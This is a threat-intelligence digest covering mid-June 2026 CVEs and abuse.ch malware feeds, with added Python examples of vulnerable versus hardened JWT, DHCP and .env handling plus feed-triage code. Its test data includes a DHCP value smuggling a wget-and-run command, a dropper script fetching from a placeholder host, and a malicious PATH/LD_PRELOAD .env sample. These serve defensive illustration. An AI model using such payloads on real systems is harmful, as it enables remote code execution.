The period from June 16-17, 2026 revealed significant vulnerability disclosures and sustained malware distribution activity. The National Vulnerability Database published 30 new CVEs, including two critical-severity vulnerabilities (CVE-2026-22313 with CVSS 9.1 and CVE-2026-53776 with CVSS 9.1) affecting network device management interfaces and JWT authentication systems. Multiple high-severity vulnerabilities were identified in OpenClaw (15 CVEs), stable-diffusion.cpp library, and enterprise infrastructure components, presenting immediate risk to organizations using these technologies.
Malware distribution infrastructure remained highly active with 51 malicious URLs catalogued by abuse.ch, dominated by Mozi botnet variants targeting IoT devices and ClearFake campaigns delivering fake browser updates. The majority of malicious payloads targeted MIPS and ARM architectures commonly found in routers, IP cameras, and embedded systems. Distribution infrastructure demonstrated geographic diversity with command-and-control servers hosted across Asia-Pacific and European networks.
Organizations should prioritize patching the two critical vulnerabilities, CVE-2026-22313 (OS command execution through the management REST API) and CVE-2026-53776 (JWT expiration validation bypass). Network defenders should monitor for Mozi botnet indicators and implement egress filtering to block communication with known malicious domains and IP addresses. No RSS articles or threat actor infrastructure seizures were recorded in this period, which points to relatively stable threat actor operations, but the volume of new vulnerabilities demands immediate attention from vulnerability management teams.
Two critical-severity CVEs and 28 high-severity vulnerabilities disclosed, affecting network devices, authentication systems, and development tools
Authenticated attackers can execute arbitrary OS commands with administrative privileges via REST API on management network. CVSS 9.1 critical severity.
Perry versions before 0.5.1166 unconditionally disable JWT expiration validation, allowing attackers to reuse expired tokens indefinitely. CVSS 9.1 critical severity.
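The Perry flaw is the "skip exp" pattern: the signature is checked but the expiration claim never is. The following is an added illustration, not Perry's code (the page gives no detail beyond the one sentence), showing a self-contained HS256 verifier in the vulnerable shape beside a hardened one that enforces exp, fails closed when exp is absent, and allows only a small clock-skew leeway. Key, claims and timestamps are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url_decode(data):
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def make_token(claims, key):
    """Mint an HS256 JWT for the demo (constructed test data, not tokens from any real issuer)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, ("%s.%s" % (header, payload)).encode("ascii"), hashlib.sha256).digest()
    return "%s.%s.%s" % (header, payload, _b64url_encode(sig))


def _verified_claims(token, key):
    """Check the HS256 signature and return the payload; raises ValueError on any mismatch."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")  # never let the token choose the algorithm
    expected = hmac.new(key, ("%s.%s" % (header_b64, payload_b64)).encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def verify_vulnerable(token, key, now=None):
    """Shape of the flaw: exp is never consulted, so a once-valid token stays valid forever."""
    return _verified_claims(token, key)


def verify_hardened(token, key, now=None, leeway=30):
    """Signature check plus mandatory exp enforcement with a small clock-skew allowance."""
    claims = _verified_claims(token, key)
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if isinstance(exp, bool) or not isinstance(exp, (int, float)):
        raise ValueError("exp claim missing or not numeric")  # fail closed when exp is absent
    if now > exp + leeway:
        raise ValueError("token expired")
    return claims


def accepts(verifier, token, key, now):
    """True if the given verifier accepts the token at time `now`."""
    try:
        verifier(token, key, now=now)
        return True
    except ValueError:
        return False
```

When auditing a JWT library for this class of bug, look for an options flag such as "verify_exp" defaulting to off, or for exp checks guarded by a condition that is always false; the hardened verifier above treats a missing exp as a hard failure rather than as "no expiry".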
Network device exposes REST API with constant authentication token, enabling unauthenticated access to system settings and command execution. CVSS 8.6 high severity.
Unsanitized DHCP reply strings in wicked dhcp client before 0.6.79 allow malicious DHCP servers to execute arbitrary code. CVSS 8.8 high severity.
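The wicked issue is the classic DHCP-hook pattern: option strings such as host-name or domain-name are spliced into a shell line that the client runs. The following is an added example, not wicked's own code, showing the vulnerable splice beside a hardened path that validates each option against the DNS name grammar and hands values to the target program as argv entries. The DHCP replies are constructed, and the resolver update is left as a validated value for a caller to apply.

```python
import re

# Constructed DHCP option values as a client hook would receive them (not real captures).
MALICIOUS_REPLY = {
    "host-name": "gw; wget http://192.0.2.1/x -O /tmp/x; sh /tmp/x",
    "domain-name": "lan`id`",
}
BENIGN_REPLY = {"host-name": "printer-01", "domain-name": "corp.example"}

# One DNS label: 1-63 chars, letters/digits, hyphens only in the interior.
_LABEL = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_dns_name(value):
    """Strict hostname grammar: at most 253 chars, dot-separated labels matching _LABEL."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    if value.endswith("."):
        value = value[:-1]
    return all(_LABEL.match(label) for label in value.split("."))


def hook_line_vulnerable(reply):
    """Option strings spliced into a shell command line: reply metacharacters become shell syntax."""
    return "hostname %s; echo 'search %s' > /etc/resolv.conf" % (
        reply["host-name"], reply["domain-name"])


def hook_args_hardened(reply):
    """Validate every string against the DNS grammar first, then hand values over as argv, not shell text."""
    host = reply.get("host-name", "")
    domain = reply.get("domain-name", "")
    for name, value in (("host-name", host), ("domain-name", domain)):
        if not is_valid_dns_name(value):
            raise ValueError("rejecting DHCP option %s: not a valid DNS name" % name)
    # Each argv element reaches the program unchanged; nothing here is parsed by a shell.
    return {"hostname_argv": ["hostname", host], "search_domain": domain}


def reply_is_accepted(reply):
    """Convenience wrapper: True when the hardened path accepts the reply."""
    try:
        hook_args_hardened(reply)
        return True
    except ValueError:
        return False
```

The same rule applies to every other string option a DHCP server controls (NTP servers, NIS domain, vendor options): validate against the option's own grammar and never let the value reach a shell.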
Revoked paired device sessions can re-establish node token authority without renewed approval in OpenClaw before 2026.5.26. CVSS 8.8 high severity.
OpenClaw contains multiple environment variable injection flaws (CVE-2026-53858, CVE-2026-53842, CVE-2026-53846) allowing attackers to execute unintended executables via workspace .env files. CVSS 7.1 high severity.
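A workspace .env file should be trusted only for the variables the application actually needs, because variables such as PATH or LD_PRELOAD decide which executable runs and what code is loaded into it. The following is an added example, not OpenClaw code (the page does not show its loader); the variable names, the allowed prefixes and the .env content are assumptions constructed for the demo. It contrasts a loader that merges every key with one that rejects execution-affecting names and admits only an allowlisted prefix.

```python
import re

# Constructed workspace .env content; a cloned repository could ship a file like this.
MALICIOUS_DOTENV = """\
# looks like ordinary project config
API_BASE=https://api.example
export PATH=/tmp/evil-bin:/usr/bin
LD_PRELOAD="/tmp/evil.so"
APP_DEBUG=1
"""

_KEY = re.compile(r"^[A-Z][A-Z0-9_]*$")

# Variables that change which binary runs or what code is loaded into it (non-exhaustive).
EXEC_AFFECTING = {
    "PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "DYLD_INSERT_LIBRARIES",
    "DYLD_LIBRARY_PATH", "NODE_OPTIONS", "PYTHONPATH", "PYTHONSTARTUP",
    "GIT_SSH_COMMAND", "GIT_EXEC_PATH", "SHELL", "BASH_ENV", "ENV", "PROMPT_COMMAND",
}


def parse_dotenv(text):
    """Minimal KEY=VALUE parser: skips comments/blank lines, tolerates 'export', strips one quote layer."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):].lstrip()
        key, value = line.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def build_env_vulnerable(dotenv_text, base_env):
    """Every key from the workspace file overrides the process environment, PATH included."""
    env = dict(base_env)
    env.update(parse_dotenv(dotenv_text))
    return env


def build_env_hardened(dotenv_text, base_env, allowed_prefixes=("APP_", "API_")):
    """Admit only well-formed keys with an allowlisted prefix; drop execution-affecting names and control chars."""
    env = dict(base_env)
    rejected = []
    for key, value in parse_dotenv(dotenv_text).items():
        if not _KEY.match(key) or key in EXEC_AFFECTING or not key.startswith(allowed_prefixes):
            rejected.append(key)
            continue
        if any(ord(c) < 32 for c in value):
            rejected.append(key)
            continue
        env[key] = value
    return env, rejected
```

The prefix allowlist is the important control: a denylist of dangerous names alone will always lag behind the next interpreter-specific variable, while a prefix makes the unexpected case the rejected one.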
Yeoman Environment versions 2.9.0-6.0.0 install missing generator packages from caller-supplied names without user confirmation. CVSS 8.6 high severity.
Elevation of privilege vulnerability in the Microsoft Malware Protection Engine, publicly disclosed under the name 'RoguePlanet'. Microsoft is working on a security update. CVSS 7.8 high severity.
Three heap buffer overflow vulnerabilities (CVE-2026-47750, CVE-2026-47747, CVE-2026-47749) in pickle .ckpt parser enable arbitrary code execution via malicious files. CVSS 7.8 high severity.
Unauthenticated attackers can exploit integer overflow in Pacemaker's remote message decompression to cause memory corruption and denial of service. CVSS 8.6 high severity.
51 malicious URLs identified distributing Mozi botnet variants, ClearFake campaigns, and information stealers targeting IoT devices and end users
35+ URLs distributing Mozi botnet payloads targeting MIPS and ARM architectures in IoT devices (routers, cameras). Distribution from compromised devices across Asia-Pacific IP ranges (110.x, 115.x, 123.x networks).
3 URLs hosting PureLogStealer/PureLogsStealer information stealer malware on Cloudflare Workers domains and compromised infrastructure (vrdccbank.com). Credential theft capability.
Multiple Mirai botnet payloads (arm, mips, x86 architectures) and shell scripts hosted on single C2 IP address. Active exploitation targeting network devices and IoT platforms.
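Triage of payload sets like the Mozi and Mirai binaries in the two entries above usually starts with the ELF header: e_ident gives bitness and endianness, and e_machine tells you which device class the dropper was built for. The following added example (not abuse.ch tooling) parses those fields and flags MIPS, ARM and AArch64 samples as embedded targets; the sample headers are constructed byte strings, not real malware.

```python
import struct

# e_machine values from the ELF specification for the architectures feeds commonly tag.
EM_NAMES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
# Architectures typical of routers, cameras and other embedded devices.
EMBEDDED_ARCHES = {"MIPS", "ARM", "AArch64"}


def classify_elf(blob):
    """Return bitness, endianness, type and machine name from an ELF header, or None if not ELF."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    machine = EM_NAMES.get(e_machine, "unknown(%d)" % e_machine)
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": {1: "REL", 2: "EXEC", 3: "DYN"}.get(e_type, "other"),
        "machine": machine,
        "embedded_target": machine in EMBEDDED_ARCHES,
    }


def constructed_elf_header(ei_class, ei_data, e_machine):
    """Build just enough of an ELF header for the demo; constructed test data, not a real sample."""
    endian = "<" if ei_data == 1 else ">"
    e_ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    # e_type=2 (EXEC), e_machine, e_version=1, then zero padding for the rest of the header.
    return e_ident + struct.pack(endian + "HHI", 2, e_machine, 1) + b"\x00" * 32


SAMPLES = {
    "mozi.mips": constructed_elf_header(1, 2, 8),   # 32-bit big-endian MIPS, typical router build
    "mozi.arm": constructed_elf_header(1, 1, 40),   # 32-bit little-endian ARM
    "bins.x86": constructed_elf_header(1, 1, 3),
    "update.sh": b"#!/bin/sh\nwget http://192.0.2.1/bins.arm -O /tmp/a\n",  # dropper script, not ELF
}


def triage(samples):
    """Map sample name -> one-line summary, flagging embedded-architecture ELF payloads."""
    out = {}
    for name, blob in samples.items():
        info = classify_elf(blob)
        if info is None:
            out[name] = "not ELF (script or other)"
        else:
            flag = " [embedded target]" if info["embedded_target"] else ""
            out[name] = "ELF%d %s %s-endian%s" % (info["bits"], info["machine"], info["endian"], flag)
    return out
```

A big-endian MIPS EXEC binary next to little-endian ARM builds from the same URL path is the usual signature of a multi-architecture IoT dropper; the shell script in the set is what fetches the right one for the victim device.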
13 URLs identified serving ClearFake malware disguised as browser updates. Domains use varied TLDs (.xyz, .com, .bet, .shop, .games) to evade detection. Social engineering tactic targeting end users.
URLs on 91.92.242.236 distributing executables dropped by Amadey botnet loader. Multi-stage infection chain for secondary payload delivery.
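To turn a feed like the one summarised in the entries above into the egress filtering the summary recommends, the following added example (not abuse.ch's own tooling) parses a constructed URLhaus-style CSV extract, splits hosts into an IP list for firewall ACLs and a domain list for DNS sinkholing, and counts entries per malware family and per ClearFake TLD. The column layout follows the URLhaus CSV export; the rows themselves use reserved documentation address ranges and reserved TLDs rather than the report's real indicators.

```python
import csv
import io
import ipaddress
from collections import Counter
from urllib.parse import urlsplit

# Constructed rows in the URLhaus CSV layout; hosts are RFC 5737 ranges and reserved TLDs, not real IOCs.
SAMPLE_FEED = """\
id,dateadded,url,url_status,last_online,threat,tags,urlhaus_link,reporter
1,2026-06-16 01:10:00,http://192.0.2.10:34567/bins/mozi.m,online,2026-06-16 01:10:00,malware_download,"elf,mips,Mozi",https://urlhaus.abuse.ch/url/1/,anon
2,2026-06-16 01:12:00,http://192.0.2.11/mozi.a,online,2026-06-16 01:12:00,malware_download,"elf,arm,Mozi",https://urlhaus.abuse.ch/url/2/,anon
3,2026-06-16 02:00:00,http://198.51.100.5/bins/x86,online,2026-06-16 02:00:00,malware_download,"elf,x86,Mirai",https://urlhaus.abuse.ch/url/3/,anon
4,2026-06-16 03:30:00,https://browser-update.example/update.js,online,2026-06-16 03:30:00,malware_download,"ClearFake,js",https://urlhaus.abuse.ch/url/4/,anon
5,2026-06-16 03:31:00,https://chrome-patch.test/index.html,online,2026-06-16 03:31:00,malware_download,"ClearFake,html",https://urlhaus.abuse.ch/url/5/,anon
6,2026-06-17 09:00:00,http://203.0.113.7/payload.exe,online,2026-06-17 09:00:00,malware_download,"Amadey,exe",https://urlhaus.abuse.ch/url/6/,anon
7,2026-06-17 10:00:00,http://192.0.2.10:34567/bins/mozi.x86,offline,2026-06-17 10:00:00,malware_download,"elf,x86,Mozi",https://urlhaus.abuse.ch/url/7/,anon
"""

# Family tags to group by; anything else is counted as "other".
FAMILY_TAGS = ("Mozi", "Mirai", "ClearFake", "Amadey", "PureLogs")


def parse_feed(text):
    """Return feed rows as dicts; the comma-separated tags column becomes a list."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["tags"] = [t for t in row["tags"].split(",") if t]
        rows.append(row)
    return rows


def family_of(tags):
    for fam in FAMILY_TAGS:
        if fam in tags:
            return fam
    return "other"


def build_blocklists(rows, include_offline=False):
    """Split hosts into an IP ACL list and a DNS sinkhole list; count per family and per ClearFake TLD."""
    ips, domains = set(), set()
    families, clearfake_tlds = Counter(), Counter()
    for row in rows:
        if row["url_status"] != "online" and not include_offline:
            continue  # stale entries inflate ACLs; keep them only on request
        host = urlsplit(row["url"]).hostname  # strips scheme, port and path
        if host is None:
            continue
        fam = family_of(row["tags"])
        families[fam] += 1
        try:
            ips.add(str(ipaddress.ip_address(host)))
        except ValueError:
            domains.add(host.lower())
            if fam == "ClearFake":
                clearfake_tlds[host.rsplit(".", 1)[-1]] += 1
    return {
        "ips": sorted(ips),
        "domains": sorted(domains),
        "families": families,
        "clearfake_tlds": clearfake_tlds,
    }
```

Splitting IPs from domains matters operationally: the IoT payload hosts are bare IPs that belong in a router or firewall deny list, while the ClearFake hosts are domains that are cheaper to handle at the resolver, and a per-TLD count makes the TLD churn described above visible over time.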
Analysis of MITRE ATT&CK techniques observed in vulnerability disclosures and malware campaigns
New digital forensics and incident response resources published during the reporting period
Analysis and comparison of digital forensics case management and investigation tools as alternatives to TheHive platform. Relevant for incident response teams evaluating case tracking solutions.